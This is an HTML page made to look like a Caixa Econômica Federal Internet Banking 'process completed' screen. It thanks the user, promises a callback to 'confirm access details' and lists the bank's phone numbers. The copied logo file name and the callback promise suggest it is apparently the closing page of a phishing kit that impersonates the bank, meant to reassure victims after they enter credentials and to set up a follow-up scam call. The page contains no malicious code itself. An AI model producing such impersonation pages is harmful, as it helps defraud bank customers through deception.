<!DOCTYPE html>
<html lang="pt-BR">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Processo Concluído</title>
  <link rel="stylesheet" href="assets/css/success_page.css">
</head>
<body>
  <header class="header">
    <img src="assets/images/logocxc-removebg-preview.png" alt="Logo Caixa" class="logo">
  </header>
  <section class="main-section">
    <div class="success-container">
      <div class="icon-container">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon">
          <path d="M20 6L9 17l-5-5"></path>
        </svg>
      </div>
      <h2>Processo Concluído</h2>
      <p>Obrigado por utilizar o Internet Banking Caixa.</p>
      <p>Para sua segurança, entraremos em contato para confirmar os detalhes do seu acesso.</p>
      <p>Caso precise de mais informações, ligue para:</p>
      <div class="contact-info">
        <p><strong>4004 0104</strong> (Capitais)</p>
        <p><strong>0800 104 0104</strong> (Demais regiões)</p>
      </div>
      <button onclick="window.location.href='index.html'" class="return-button">Voltar para o início</button>
    </div>
  </section>
  <footer>
    <p>Caixa Econômica Federal - Todos os direitos reservados.</p>
  </footer>
</body>
</html>
